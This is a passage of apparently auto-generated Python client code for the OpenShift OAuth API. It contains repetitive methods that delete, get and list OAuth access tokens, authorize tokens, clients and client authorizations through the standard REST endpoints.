:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_oauth_openshift_io_v1_collection_o_auth_authorize_token" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_oauth_openshift_io_v1_collection_o_auth_client(self, **kwargs):
"""
delete collection of OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_client(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_oauth_openshift_io_v1_collection_o_auth_client_with_http_info(**kwargs)
else:
(data) = self.delete_oauth_openshift_io_v1_collection_o_auth_client_with_http_info(**kwargs)
return data
def delete_oauth_openshift_io_v1_collection_o_auth_client_with_http_info(self, **kwargs):
"""
delete collection of OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_client_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_oauth_openshift_io_v1_collection_o_auth_client" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclients'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_oauth_openshift_io_v1_collection_o_auth_client_authorization(self, **kwargs):
"""
delete collection of OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_client_authorization(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_oauth_openshift_io_v1_collection_o_auth_client_authorization_with_http_info(**kwargs)
else:
(data) = self.delete_oauth_openshift_io_v1_collection_o_auth_client_authorization_with_http_info(**kwargs)
return data
def delete_oauth_openshift_io_v1_collection_o_auth_client_authorization_with_http_info(self, **kwargs):
"""
delete collection of OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_collection_o_auth_client_authorization_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_oauth_openshift_io_v1_collection_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_oauth_openshift_io_v1_o_auth_access_token(self, name, body, **kwargs):
"""
delete an OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_access_token(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAccessToken (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
else:
(data) = self.delete_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, **kwargs)
return data
def delete_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, name, body, **kwargs):
"""
delete an OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_access_token_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAccessToken (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_oauth_openshift_io_v1_o_auth_access_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_oauth_openshift_io_v1_o_auth_access_token`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_oauth_openshift_io_v1_o_auth_access_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthaccesstokens/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_oauth_openshift_io_v1_o_auth_authorize_token(self, name, body, **kwargs):
"""
delete an OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_authorize_token(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAuthorizeToken (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
else:
(data) = self.delete_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, **kwargs)
return data
def delete_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(self, name, body, **kwargs):
"""
delete an OAuthAuthorizeToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_authorize_token_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthAuthorizeToken (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_oauth_openshift_io_v1_o_auth_authorize_token" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_oauth_openshift_io_v1_o_auth_authorize_token`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_oauth_openshift_io_v1_o_auth_authorize_token`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthauthorizetokens/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_oauth_openshift_io_v1_o_auth_client(self, name, body, **kwargs):
"""
delete an OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_client(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClient (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
else:
(data) = self.delete_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, **kwargs)
return data
def delete_oauth_openshift_io_v1_o_auth_client_with_http_info(self, name, body, **kwargs):
"""
delete an OAuthClient
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_client_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClient (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_oauth_openshift_io_v1_o_auth_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_oauth_openshift_io_v1_o_auth_client`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_oauth_openshift_io_v1_o_auth_client`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclients/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_oauth_openshift_io_v1_o_auth_client_authorization(self, name, body, **kwargs):
"""
delete an OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_client_authorization(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
else:
(data) = self.delete_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, **kwargs)
return data
def delete_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(self, name, body, **kwargs):
"""
delete an OAuthClientAuthorization
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_oauth_openshift_io_v1_o_auth_client_authorization_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the OAuthClientAuthorization (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty', 'grace_period_seconds', 'orphan_dependents']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_oauth_openshift_io_v1_o_auth_client_authorization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_oauth_openshift_io_v1_o_auth_client_authorization`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_oauth_openshift_io_v1_o_auth_client_authorization`")
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/oauthclientauthorizations/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'grace_period_seconds' in params:
query_params['gracePeriodSeconds'] = params['grace_period_seconds']
if 'orphan_dependents' in params:
query_params['orphanDependents'] = params['orphan_dependents']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_oauth_openshift_io_v1_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_oauth_openshift_io_v1_api_resources(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_oauth_openshift_io_v1_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_oauth_openshift_io_v1_api_resources_with_http_info(**kwargs)
return data
def get_oauth_openshift_io_v1_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_oauth_openshift_io_v1_api_resources_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_oauth_openshift_io_v1_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/oauth.openshift.io/v1/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedAPIResourceList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_oauth_openshift_io_v1_o_auth_access_token(self, **kwargs):
"""
list or watch objects of kind OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_access_token(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1OAuthAccessTokenList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_oauth_openshift_io_v1_o_auth_access_token_with_http_info(**kwargs)
else:
(data) = self.list_oauth_openshift_io_v1_o_auth_access_token_with_http_info(**kwargs)
return data
def list_oauth_openshift_io_v1_o_auth_access_token_with_http_info(self, **kwargs):
"""
list or watch objects of kind OAuthAccessToken
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_oauth_openshift_io_v1_o_auth_access_token_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
